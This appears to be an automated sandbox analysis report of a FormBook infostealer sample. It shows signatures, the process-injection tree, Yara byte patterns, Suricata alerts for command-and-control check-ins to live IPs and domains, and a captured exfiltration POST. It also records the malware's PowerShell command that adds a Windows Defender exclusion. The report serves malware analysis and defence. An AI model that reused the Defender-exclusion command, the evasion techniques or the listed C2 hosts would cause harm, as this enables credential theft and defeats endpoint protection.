Windows Analysis Report
Scan 00093847.exe

Overview

General Information

Sample name: Scan 00093847.exe
Analysis ID: 1506403
MD5: 7c580b0bf94b5edb15717136670a8092
SHA1: 92393d585cfc170824a8184e68d2724a42b68835
SHA256: 9d606ced77696b89acfe57d52547936b3b36f8bce44fbde3efa787e693f82637
Tags: exe, Formbook
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Scan 00093847.exe (PID: 5480 cmdline: "C:\Users\user\Desktop\Scan 00093847.exe" MD5: 7C580B0BF94B5EDB15717136670A8092)
    • powershell.exe (PID: 6104 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Scan 00093847.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Scan 00093847.exe (PID: 5436 cmdline: "C:\Users\user\Desktop\Scan 00093847.exe" MD5: 7C580B0BF94B5EDB15717136670A8092)
      • uspEUeZyrqFDmi.exe (PID: 4008 cmdline: "C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • setupugc.exe (PID: 7076 cmdline: "C:\Windows\SysWOW64\setupugc.exe" MD5: 342CBB77B3F4B3F073DF2F042D20E121)
          • uspEUeZyrqFDmi.exe (PID: 4520 cmdline: "C:\Program Files (x86)\tCOcyHxoqsCoNIjtuwUUsZaeMdUgQPXlWOiIwEbnrUekxqujRdCpkqIhnVlDIOxFeLCdbqSIeKhwe\uspEUeZyrqFDmi.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1852 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000003.00000002.2069489758.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.2069489758.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2f2a3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17412:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000009.00000002.3553617702.0000000003780000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000009.00000002.3553617702.0000000003780000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2bfe0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x1414f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.2070910254.00000000013F0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
3.2.Scan 00093847.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
3.2.Scan 00093847.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2e4a3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16612:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
3.2.Scan 00093847.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
3.2.Scan 00093847.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2f2a3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17412:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Scan 00093847.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Scan 00093847.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Scan 00093847.exe", ParentImage: C:\Users\user\Desktop\Scan 00093847.exe, ParentProcessId: 5480, ParentProcessName: Scan 00093847.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Scan 00093847.exe", ProcessId: 6104, ProcessName: powershell.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Scan 00093847.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Scan 00093847.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Scan 00093847.exe", ParentImage: C:\Users\user\Desktop\Scan 00093847.exe, ParentProcessId: 5480, ParentProcessName: Scan 00093847.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Scan 00093847.exe", ProcessId: 6104, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-07T21:43:36.228581+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 56228 | 82.221.128.183 | 80 | TCP
2024-09-07T21:44:07.694615+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 56233 | 217.160.0.127 | 80 | TCP
2024-09-07T21:44:21.251583+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 56237 | 85.159.66.93 | 80 | TCP
2024-09-07T21:44:35.274281+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 56241 | 18.139.62.226 | 80 | TCP
2024-09-07T21:44:49.014006+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 56245 | 162.0.213.94 | 80 | TCP
2024-09-07T21:45:02.701525+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 56249 | 3.33.130.190 | 80 | TCP
2024-09-07T21:45:16.809766+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 56253 | 13.248.169.48 | 80 | TCP
2024-09-07T21:45:31.255864+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 56257 | 185.134.245.113 | 80 | TCP
2024-09-07T21:45:45.914448+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 56261 | 103.42.108.46 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-07T21:44:00.021494+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 56230 | 217.160.0.127 | 80 | TCP
2024-09-07T21:44:02.597060+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 56231 | 217.160.0.127 | 80 | TCP
2024-09-07T21:44:05.121163+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 56232 | 217.160.0.127 | 80 | TCP
2024-09-07T21:44:13.635184+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 56234 | 85.159.66.93 | 80 | TCP
2024-09-07T21:44:16.178192+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 56235 | 85.159.66.93 | 80 | TCP
2024-09-07T21:44:18.855613+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 56236 | 85.159.66.93 | 80 | TCP
2024-09-07T21:44:27.653098+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 56238 | 18.139.62.226 | 80 | TCP
2024-09-07T21:44:30.171638+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 56239 | 18.139.62.226 | 80 | TCP
2024-09-07T21:44:32.745379+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 56240 | 18.139.62.226 | 80 | TCP
2024-09-07T21:44:41.381314+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 56242 | 162.0.213.94 | 80 | TCP
2024-09-07T21:44:43.921266+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 56243 | 162.0.213.94 | 80 | TCP
2024-09-07T21:44:46.507584+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 56244 | 162.0.213.94 | 80 | TCP
2024-09-07T21:44:55.044638+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 56246 | 3.33.130.190 | 80 | TCP
2024-09-07T21:44:57.590729+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 56247 | 3.33.130.190 | 80 | TCP
2024-09-07T21:45:00.152606+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 56248 | 3.33.130.190 | 80 | TCP
2024-09-07T21:45:08.215628+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 56250 | 13.248.169.48 | 80 | TCP
2024-09-07T21:45:11.261505+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 56251 | 13.248.169.48 | 80 | TCP
2024-09-07T21:45:14.263668+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 56252 | 13.248.169.48 | 80 | TCP
2024-09-07T21:45:23.571419+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 56254 | 185.134.245.113 | 80 | TCP
2024-09-07T21:45:26.061528+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 56255 | 185.134.245.113 | 80 | TCP
2024-09-07T21:45:28.592743+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 56256 | 185.134.245.113 | 80 | TCP
2024-09-07T21:45:37.497476+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 56258 | 103.42.108.46 | 80 | TCP
2024-09-07T21:45:40.787323+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 56259 | 103.42.108.46 | 80 | TCP
2024-09-07T21:45:43.323564+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 56260 | 103.42.108.46 | 80 | TCP

            AV Detection

            Source: Yara matchFile source: 3.2.Scan 00093847.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.Scan 00093847.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.2069489758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3553617702.0000000003780000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2070910254.00000000013F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3555734438.0000000004F50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2071077232.0000000002950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3552629363.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: Scan 00093847.exe, Joe Sandbox ML: detected
Source: Scan 00093847.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Scan 00093847.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: WYNp.pdbSHA256 source: Scan 00093847.exe
            Source: Binary string: setupugc.pdb source: Scan 00093847.exe, 00000003.00000002.2069726961.0000000000BE8000.00000004.00000020.00020000.00000000.sdmp, uspEUeZyrqFDmi.exe, 00000008.00000002.3553025155.0000000001088000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: uspEUeZyrqFDmi.exe, 00000008.00000000.1983763767.0000000000ADE000.00000002.00000001.01000000.0000000C.sdmp, uspEUeZyrqFDmi.exe, 0000000B.00000002.3553078473.0000000000ADE000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: Scan 00093847.exe, 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, 00000009.00000003.2069789007.00000000037F2000.00000004.00000020.00020000.00000000.sdmp, setupugc.exe, 00000009.00000003.2071753263.00000000039A3000.00000004.00000020.00020000.00000000.sdmp, setupugc.exe, 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: WYNp.pdb source: Scan 00093847.exe
            Source: Binary string: wntdll.pdb source: Scan 00093847.exe, Scan 00093847.exe, 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, setupugc.exe, 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, 00000009.00000003.2069789007.00000000037F2000.00000004.00000020.00020000.00000000.sdmp, setupugc.exe, 00000009.00000003.2071753263.00000000039A3000.00000004.00000020.00020000.00000000.sdmp, setupugc.exe, 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: setupugc.pdbGCTL source: Scan 00093847.exe, 00000003.00000002.2069726961.0000000000BE8000.00000004.00000020.00020000.00000000.sdmp, uspEUeZyrqFDmi.exe, 00000008.00000002.3553025155.0000000001088000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 9_2_0326C520 FindFirstFileW,FindNextFileW,FindClose,9_2_0326C520
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 4x nop then jmp 07A7E3DEh0_2_07A7EBDA
            Source: C:\Users\user\Desktop\Scan 00093847.exeCode function: 4x nop then jmp 07A7E3DEh0_2_07A7EC89
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 4x nop then xor eax, eax9_2_03259C00
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 4x nop then mov ebx, 00000004h9_2_03970469

            Networking

            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:56249 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:56261 -> 103.42.108.46:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:56237 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56251 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:56228 -> 82.221.128.183:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56240 -> 18.139.62.226:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56234 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56247 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56248 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:56253 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56236 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56244 -> 162.0.213.94:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56242 -> 162.0.213.94:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56239 -> 18.139.62.226:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56255 -> 185.134.245.113:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56254 -> 185.134.245.113:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56252 -> 13.248.169.48:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:56257 -> 185.134.245.113:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:56233 -> 217.160.0.127:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56258 -> 103.42.108.46:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56246 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56243 -> 162.0.213.94:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:56245 -> 162.0.213.94:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56259 -> 103.42.108.46:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56235 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56260 -> 103.42.108.46:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56256 -> 185.134.245.113:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56238 -> 18.139.62.226:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:56241 -> 18.139.62.226:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56232 -> 217.160.0.127:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56230 -> 217.160.0.127:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56231 -> 217.160.0.127:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:56250 -> 13.248.169.48:80
            Source: DNS query: www.nevsehir-nakliyat.xyz
            Source: Joe Sandbox ViewIP Address: 162.0.213.94 162.0.213.94
            Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
            Source: Joe Sandbox ViewASN Name: ACPCA ACPCA
            Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
            Source: Joe Sandbox ViewASN Name: THORDC-ASIS THORDC-ASIS
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficDNS traffic detected: DNS query: www.nosr.net
            Source: global trafficDNS traffic detected: DNS query: www.monos.shop
            Source: global trafficDNS traffic detected: DNS query: www.complexity.pub
            Source: global trafficDNS traffic detected: DNS query: www.nevsehir-nakliyat.xyz
            Source: global trafficDNS traffic detected: DNS query: www.masteriocp.online
            Source: global trafficDNS traffic detected: DNS query: www.kryto.top
            Source: global trafficDNS traffic detected: DNS query: www.angelenterprise.biz
            Source: global trafficDNS traffic detected: DNS query: www.dyme.tech
            Source: global trafficDNS traffic detected: DNS query: www.lilibetmed.online
            Source: global trafficDNS traffic detected: DNS query: www.mbwd.store
            Source: global trafficDNS traffic detected: DNS query: www.terrearcenciel.online
            Source: unknownHTTP traffic detected: POST /4c7j/ HTTP/1.1Host: www.complexity.pubAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.5Content-Length: 204Connection: closeCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedOrigin: http://www.complexity.pubReferer: http://www.complexity.pub/4c7j/User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530Data Raw: 64 78 57 6c 6a 54 36 3d 73 70 73 6e 35 38 38 54 47 41 6b 46 6e 77 30 41 31 53 68 69 73 6e 76 6f 56 6e 56 67 38 32 55 30 36 34 55 31 46 35 65 5a 46 41 47 75 44 78 78 53 6c 43 6c 54 48 5a 61 6f 35 6c 63 69 48 39 4a 54 49 69 6f 76 64 72 6d 64 77 55 79 31 6c 47 6c 6c 38 30 71 37 32 30 5a 68 70 4d 61 6f 69 50 6b 50 31 4e 48 73 41 39 58 42 4b 62 43 76 71 59 2f 78 78 46 33 49 51 68 4e 37 2b 5a 45 64 73 42 51 2b 38 2b 6c 79 41 7a 35 71 45 44 4a 4f 73 48 72 38 4a 52 66 63 52 70 50 4f 33 33 68 6e 4e 52 49 35 44 4c 41 77 52 66 78 61 6d 63 7a 71 61 4b 51 64 6f 2f 4c 36 73 31 6c 36 58 59 75 57 71 69 53 6b 4d 41 3d 3d Data Ascii: dxWljT6=spsn588TGAkFnw0A1ShisnvoVnVg82U064U1F5eZFAGuDxxSlClTHZao5lciH9JTIiovdrmdwUy1lGll80q720ZhpMaoiPkP1NHsA9XBKbCvqY/xxF3IQhN7+ZEdsBQ+8+lyAz5qEDJOsHr8JRfcRpPO33hnNRI5DLAwRfxamczqaKQdo/L6s1l6XYuWqiSkMA==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 07 Sep 2024 19:43:32 GMTServer: ApacheAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Connection: closeTransfer-Encoding: chunkedContent-Type: text/html
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Sat, 07 Sep 2024 19:43:59 GMTServer: ApacheContent-Encoding: gzip
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Sat, 07 Sep 2024 19:44:02 GMTServer: ApacheContent-Encoding: gzip
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Sat, 07 Sep 2024 19:44:05 GMTServer: ApacheContent-Encoding: gzip
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 601Connection: closeDate: Sat, 07 Sep 2024 19:44:07 GMTServer: Apache
Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Die angegebene Seite konnte nicht gefunden werden. </p> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Sat, 07 Sep 2024 19:44:13 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-09-07T19:44:18.5264901Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Sat, 07 Sep 2024 19:44:16 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 18X-Rate-Limit-Reset: 2024-09-07T19:44:18.5264901Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Sat, 07 Sep 2024 19:44:18 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-09-07T19:44:23.7520817Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Sat, 07 Sep 2024 19:44:21 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-09-07T19:44:26.1475682Z
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 07 Sep 2024 19:44:41 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 07 Sep 2024 19:44:43 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 07 Sep 2024 19:44:46 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html
